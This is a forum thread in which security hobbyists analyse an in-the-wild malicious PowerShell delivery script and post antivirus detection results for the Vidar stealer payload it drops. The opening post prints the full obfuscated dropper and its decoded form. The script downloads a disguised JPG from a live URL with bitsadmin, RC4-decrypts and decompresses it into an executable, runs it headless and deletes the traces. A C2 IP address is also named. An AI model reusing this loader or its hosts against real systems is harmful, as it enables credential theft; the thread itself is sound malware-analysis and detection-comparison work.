在野样本 恶意脚本投递

wwwab

原始传播脚本:

1. PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8;$c=[System.Convert];$egb=$e.GetBytes;$egs=$e.GetString;$cf=$c::FromBase64String;$ct=$c::ToBase64String;$u='https://thanjainatural.com/z/00f939ae7729.jpg';$egs.Invoke($cf.Invoke('KE5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsKS5Qb3B1cCgnSW50ZXJuZXQgRXJyb3IhJywzLCdBdXRoJywweDMwKTtmdW5jdGlvbiBmNTBmMzN7cGFyYW0oJGssJGQpJG89TmV3LU9iamVjdCBieXRlW10gJGQuTGVuZ3RoOyRzPTAuLjI1NTskaj0wO2ZvcigkaT0wOyRpLWx0MjU2OyRpKyspeyRqPSgkaiskc1skaV0rJGtbJGklJGsuTGVuZ3RoXSklMjU2OyRzWyRpXSwkc1skal09JHNbJGpdLCRzWyRpXX0kaT0kaj0wO2ZvcigkYz0wOyRjLWx0JGQuTGVuZ3RoOyRjKyspeyRpPSgkaSsxKSUyNTY7JGo9KCRqKyRzWyRpXSklMjU2OyRzWyRpXSwkc1skal09JHNbJGpdLCRzWyRpXTskb1skY109JGRbJGNdLWJ4b3Ikc1soJHNbJGldKyRzWyRqXSklMjU2XX0kb307ZnVuY3Rpb24gZjFjNDM1KCRiKXskbT1bSU8uTWVtb3J5U3RyZWFtXTo6bmV3KCk7JGc9W0lPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW1dOjpuZXcoW0lPLk1lbW9yeVN0cmVhbV06Om5ldygkYiksW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyRnLkNvcHlUbygkbSk7JGcuQ2xvc2UoKTskbS5Ub0FycmF5KCl9OyRrZXk9JGNmLkludm9rZSgnTURCbU9UTTVZV1UzTnpJNScpOyRwX3plcm89LWpvaW4oJGVudjpURU1QLCdcMDBmOTM5YWU3NzI5LmpwZycpOyRwX2xhc3Q9LWpvaW4oJGVudjpURU1QLCdcMDBmOTM5YWU3NzI5LmV4ZScpOyYoYml0c2FkbWluLmV4ZSAvdHJhbnNmZXIgMDBmOTM5YWU3NzI5IC9wcmlvcml0eSBGT1JFR1JPVU5EICR1ICRwX3plcm8pOyRpbWFnZV9ieXRlcz0kaWZyLkludm9rZSgkcF96ZXJvKTsKJHplcm9fYnl0ZXM9JGltYWdlX2J5dGVzWzExODE5MS4uKCRpbWFnZV9ieXRlcy5MZW5ndGggLSAxKV07CiRvbmVfYnl0ZXM9ZjUwZjMzICRrZXkgJHplcm9fYnl0ZXM7CiR0d29fYnl0ZXM9ZjFjNDM1ICRvbmVfYnl0ZXM7CiRpZncuSW52b2tlKCRwX2xhc3QsJHR3b19ieXRlcyk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJ2Nvbmhvc3QuZXhlJyAtQXJndW1lbnRMaXN0ICctLWhlYWRsZXNzJywkcF9sYXN0IC1Ob05ld1dpbmRvdzsKU3RhcnQtU2xlZXAgLVNlY29uZHMgMzAwO1JlbW92ZS1JdGVtIC1QYXRoICRwX3plcm8sJHBfbGFzdCAtRm9yY2UgLUVycm9yQWN0aW9uIElnbm9yZTs='))|iex;$z='                                                                                                                            C:\Users\Default\Documents\Meta\Facebook\Shared\Identity.pdf'"

复制代码

将$egs.Invoke($cf.Invoke(arg))中的base64 arg解码后:

1. (New-Object -ComObject Wscript.Shell).Popup('Internet Error!',3,'Auth',0x30);function f50f33{param($k,$d)$o=New-Object byte[] $d.Length;$s=0..255;$j=0;for($i=0;$i-lt256;$i++){$j=($j+$s[$i]+$k[$i%$k.Length])%256;$s[$i],$s[$j]=$s[$j],$s[$i]}$i=$j=0;for($c=0;$c-lt$d.Length;$c++){$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$o[$c]=$d[$c]-bxor$s[($s[$i]+$s[$j])%256]}$o};function f1c435($b){$m=[IO.MemoryStream]::new();$g=[IO.Compression.GZipStream]::new([IO.MemoryStream]::new($b),[IO.Compression.CompressionMode]::Decompress);$g.CopyTo($m);$g.Close();$m.ToArray()};$key=$cf.Invoke('MDBmOTM5YWU3NzI5');$p_zero=-join($env:TEMP,'\00f939ae7729.jpg');$p_last=-join($env:TEMP,'\00f939ae7729.exe');&(bitsadmin.exe /transfer 00f939ae7729 /priority FOREGROUND $u $p_zero);$image_bytes=$ifr.Invoke($p_zero);
   
2. $zero_bytes=$image_bytes[118191..($image_bytes.Length - 1)];
   
3. $one_bytes=f50f33 $key $zero_bytes;
   
4. $two_bytes=f1c435 $one_bytes;
   
5. $ifw.Invoke($p_last,$two_bytes);Start-Process -FilePath 'conhost.exe' -ArgumentList '--headless',$p_last -NoNewWindow;
   
6. Start-Sleep -Seconds 300;Remove-Item -Path $p_zero,$p_last -Force -ErrorAction Ignore;

复制代码

附上00f939ae7729.jpg:  (https[:]//thanjainatural.com/z/00f939ae7729.jpg)






把Start-Process -FilePath那一行去掉改了一下脚本跑了一下，提取到00f939ae7729.exe一枚:

ulyanov2233

卡巴解压启发式分析杀，eset扫描miss，elg信誉显示三天前被发现，可不可以认为eset漏毒了vt初扫是8/72：VirusTotal - File - 70ae293eb1c023d40a8a48d6109a1bf792e1877a72433bcc89613461cffc7b61

事件: 对象的备份副本已创建
用户: DESKTOP-RMLF8R4\kasperky
用户类型: 发起者
应用程序名称: WinRAR.exe
应用程序路径: C:\Program Files\WinRAR
组件: 文件反病毒
结果描述: 已创建备份副本
类型: 木马
名称: VHO:Trojan-PSW.Win32.Vidar.gen
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: 00f939ae7729.exe
对象路径: C:\Users\kasperky\Downloads\exe
对象的 MD5: 3344A2D675911A0136199004CF8EC059

c2地址在土耳其:77.90.153.127

cat-2021

BD扫描miss（未连接云，病毒库最新）沙箱双击miss

hansyu

McAfee
Trojan:Win/Vidar.BSX

LSPD

eis miss

GDHJDSYDH

ESSP扫描miss，沙盒内运行HMPA拦截

munsimli

Emsisoft掃描miss，雙擊miss進程被掛起

UNknownOoo

火绒
扫描：
原始脚本 -> 未检出
解码脚本 -> 未检出
exe -> 未检出

运行：
原始脚本 -> 未检出
解码脚本 -> 未检出
exe -> 内存防护捉注入msedge的恶意代码

1. 病毒名称：HEUR:TrojanSpy/Stealer.cn
   
2. 病毒ID：3BEDBCE4BDC03C44
   
3. 虚拟地址：0x000000002C5F0000
   
4. 映像大小：164KB
   
5. 是否完整映像：否
   
6. 数据流哈希：776c6a4c
   
7. 操作结果：处理成功，进程已结束
   
8. 进程ID：4636
   
9. 操作进程：C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
   
10. 操作进程命令行："C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    
11. 父进程ID：5740
    
12. 父进程：C:\Windows\SysWOW64\dllhost.exe
    
13. 父进程命令行："C:\Windows\SysWOW64\dllhost.exe"

复制代码

munsimli

MD解壓殺了

已偵測到 : Trojan:Win32/Wacatac.H!ml

lsop1349987

Avira双击kill
avast双击kill